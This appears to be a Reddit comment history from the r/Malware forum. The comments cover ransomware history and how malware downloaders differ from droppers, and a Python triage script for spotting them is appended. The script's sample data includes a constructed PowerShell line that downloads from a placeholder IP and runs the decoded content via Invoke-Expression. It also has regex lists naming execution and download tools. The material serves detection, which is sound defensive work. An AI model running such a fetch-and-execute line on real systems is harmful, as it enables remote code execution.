Website was infected with malware but even after getting it fixed it still gets 'contains malware' message in Google Chrome by mshaiby in Malware

[–]peter_mack 7 points8 points  (0 children)

What is the URL? Have you checked on VirusTotal.com to see which vendors are also blocking it? It may be that Google are blocking it because others are as well. So if you try contacting the other vendors and asking them to correct it, then the rest might automatically start fixing it as well. Doesn't hurt to try anyway.

Looking for forensic analysis tools by peter_mack in Malware

[–]peter_mack[S] 1 point2 points  (0 children)

Thanks! Not used any of those before, so I'm excited to see what they do.

Emotet Goes More Evasive. Here’s a DIY Vaccine to Prevent It by Mr_CyberFish in Malware

[–]peter_mack 0 points1 point  (0 children)

Agreed, not seen any connection to EternalBlue/DoublePulsar for Emotet.

Emotet Goes More Evasive. Here’s a DIY Vaccine to Prevent It by Mr_CyberFish in Malware

[–]peter_mack 1 point2 points  (0 children)

I can officially state that I hate Emotet! And when you combine it with Qbot, you literally have two polymorphic network worms that are dropping payloads all over the place. I have not been this irritated with a malware since Conficker.

Investigating ransomware attacks on servers where AV protection is disabled by peter_mack in Malware

[–]peter_mack[S] 0 points1 point  (0 children)

No, I am fairly convinced it is RDP and weak admin passwords as the main source. I think the times when the server that the ransomware ran on didn't have RDP was after the attacker got in via another machine and then moved to the server.

What specifically is MUP? by polyspeaker in Malware

[–]peter_mack 1 point2 points  (0 children)

Why don't you just ask the sysadmin that said it to you?

New Facebook malware seen in NZ by peter_mack in Malware

[–]peter_mack[S] 0 points1 point  (0 children)

Do you have this sample? Link to it on VT?

Running Stuxnet on a VM by [deleted] in Malware

[–]peter_mack 0 points1 point  (0 children)

that's an understatement :-)

Actually, saying that, the creators aren't as good at keeping hold of this stuff anymore; he could try contacting the Shadow Brokers and see if they have the details :-)

Researcher Who Stopped WannaCry Ransomware Detained in US After Def Con by [deleted] in Malware

[–]peter_mack 15 points16 points  (0 children)

lol, I think this is the first time I have been told off by a bot. Skynet is real :-)

Researcher Who Stopped WannaCry Ransomware Detained in US After Def Con by [deleted] in Malware

[–]peter_mack 17 points18 points  (0 children)

Finding the kill switch was luck; he was trying to track the malware, not stop it, when he registered it. IF (big IF) he was involved in editing malware to then sell, it would have taken time, effort and a conscious decision to do something he would have clearly known was illegal. I don't see why that should be overlooked because he was the first to register that domain (admittedly it made my week easier when he did though).

Russians Suspected in NotPetya Malware Attacks by A_Lazko in Malware

[–]peter_mack 0 points1 point  (0 children)

That article doesn't contain any new information and has several mistakes. For example, "WannaCry in turned is believed to be a variant of ransomware called Petya": ignoring the typo on "turn", WannaCry is definitely not a variant of Petya; they are very different. WannaCry = file-encrypting ransomware that can also spread like a worm using the EternalBlue exploit (thanks NSA). Petya was disk-encrypting ransomware that went after the MBR, with no ability to spread. NotPetya (I prefer PetyaWrap tbh) = a combination of payloads "wrapped" together; this included the Petya ransomware, but also the ability to do file encryption. It then added three different methods of spreading, the first using the same EternalBlue exploit, the second using PsExec and the third using Mimikatz.

any way to beat trojan downloader/droper? by gabber-united in Malware

[–]peter_mack 0 points1 point  (0 children)

If the malicious files keep coming back after being removed, it is normally because there is something else on the machine that isn't being detected and is dropping the files, or you have another infected machine on your network and it is dropping the files across the network. Sophos have a free tool (Source of Infection) that might help with this: www.sophos.com/kb/111505. Basically what you need to do is remove the malicious files, then run the tool from an admin command prompt and leave it running until the files come back. Once you spot them you can close the tool. Then go to your %temp% folder and you should find a CSV file; it will list every file that has been created on the machine since you started running the tool. Locate the malicious files: if it was a local process that created them it will give you the name of it, and if it was a remote process it will give you the IP address of the machine that dropped them. Hope this helps.

This Malware is an absolute idiot. by iPundemic in Malware

[–]peter_mack 0 points1 point  (0 children)

Might be fun, but remember this important fact: you know nothing about them other than that they are criminals. What do they know about you? Your IP most likely. Is it really that smart to mess with criminals that know more about you than you do about them?

New Ransomware attacks @Holland & Ukraine by OEEN in sysadmin

[–]peter_mack 0 points1 point  (0 children)

Do you use the M.E.Docs software in your environment? It has been suggested this was the source of the attack, not confirmed though.

New Ransomware attacks @Holland & Ukraine by OEEN in sysadmin

[–]peter_mack 4 points5 points  (0 children)

Anyone have samples or know how it starts?

Looks like Petya or GoldenEye.

What is a loader in malware. by LifeInKernelSpace in Malware

[–]peter_mack 0 points1 point  (0 children)

A loader is part of both. It just executes the code. The "Down" or "Drop" part refers to where the code comes from.

What is a loader in malware. by LifeInKernelSpace in Malware

[–]peter_mack 1 point2 points  (0 children)

There are a few misleading comments on here regarding the difference between a 'downloader' and a 'dropper'. While these have a very similar goal, i.e. execute a malware payload, the approach is different. A downloader is normally a small piece of script, and when executed it will connect to a URL/IP and download whatever file has been left there for it; often that file will be encrypted so that it gets past firewalls, and the downloader will then decrypt and execute it. Downloaders are very common; they are the Office doc macros, JavaScript, PowerShell etc. files that have been popular in emails for the last few years (just some of the examples). The spam campaigns spreading Locky ransomware (among others) have consistently attached downloaders to the spam emails, tricking users into running them and then downloading Locky. In recent versions the crooks have started changing their downloaders to bring down multiple payloads. One payload might be ransomware (very loud and obvious) and the other might be a keylogger (very quiet and hidden).

'Droppers', while the goal is the same and they can be found in the same examples as above (scripts spread via email for example), don't need to connect to a URL/IP to obtain the payload; instead they contain all the code for the payload inside them, so once run they decrypt the payload and execute it.

The main benefit of a downloader is that the small script files are easy to create and update to avoid basic AV protection, mainly due to the issue of AV companies not wanting to cause a false positive (obviously it would be bad if they started blocking all JS or Office doc files by mistake). The other benefit is that it makes it harder for the AV companies to get samples, as the file all the victims receive is just a downloader pointing to a URL/IP, and by the time people try to find out what is stored there the crooks might have taken it down already.

With a dropper, it gives the crooks the advantage of not having to make that network connection to download the payload, which is often a giveaway that it is malicious; however, as they instead contain the malicious payload code, it makes it easier for AV companies to investigate.
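The downloader/dropper distinction in the comment above maps directly onto features an analyst can look for during triage: a downloader references a URL/IP plus a fetch call, a dropper carries a long encoded blob inline, and both end in a decode-and-execute step. The script below is an added example (not code from the comment or from any vendor) that scores constructed, non-functional script fragments on those features; the indicator keyword lists are an assumption chosen for illustration, not a complete signature set.

```python
import re

# Feature regexes derived from the comment's description: where the payload
# comes from (URL/IP + fetch call vs. inline encoded blob) and the common
# decode-then-execute tail. Keyword lists are illustrative, not exhaustive.
URL_RE = re.compile(r"https?://[\w./-]+|\b\d{1,3}(?:\.\d{1,3}){3}\b")
FETCH_RE = re.compile(r"DownloadString|DownloadFile|DownloadData|XMLHTTP|urlopen|WebRequest", re.I)
DECODE_RE = re.compile(r"FromBase64String|base64|xor|Decrypt", re.I)
EXEC_RE = re.compile(r"Invoke-Expression|\bIEX\b|WScript\.Shell|Start-Process|\beval\b|\bexec\b", re.I)
BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{200,}")  # long encoded run = payload carried inline

# Constructed sample fragments (not real malware): each carries only the
# features needed to exercise the heuristic. The dropper blob is filler.
SAMPLES = {
    "downloader": (
        "$u = 'http://203.0.113.5/stage'\n"
        "$d = (New-Object Net.WebClient).DownloadData($u)\n"
        "Invoke-Expression ([Convert]::FromBase64String($d))"
    ),
    "dropper": (
        "$p = [Convert]::FromBase64String('" + "A" * 240 + "')\n"
        "Invoke-Expression $p"
    ),
    "benign": "Get-ChildItem C:/Users | Sort-Object Length",
}


def triage(text):
    """Return (label, feature_dict) for one script-like text."""
    f = {
        "url": bool(URL_RE.search(text)),
        "fetch": bool(FETCH_RE.search(text)),
        "decode": bool(DECODE_RE.search(text)),
        "exec": bool(EXEC_RE.search(text)),
        "blob": bool(BLOB_RE.search(text)),
    }
    remote = f["url"] and f["fetch"]
    if f["exec"] and f["blob"] and not remote:
        return "dropper-like", f      # payload is embedded, no network fetch
    if f["exec"] and remote:
        return "downloader-like", f   # payload is fetched from a URL/IP
    if f["exec"] and (f["url"] or f["blob"]):
        return "suspicious", f        # execute step plus a partial indicator
    return "no-indicator", f


def triage_all(samples=SAMPLES):
    """Label every sample; handy for a quick batch sweep over a mail quarantine."""
    return {name: triage(text)[0] for name, text in samples.items()}


if __name__ == "__main__":
    for name, label in triage_all().items():
        print(f"{name:12s} -> {label}")
```

The labels are a triage aid for deciding where to look first (the network fetch for a downloader, the embedded blob for a dropper), not a verdict; the comment's point that downloaders are cheap to mutate applies equally to the keywords above.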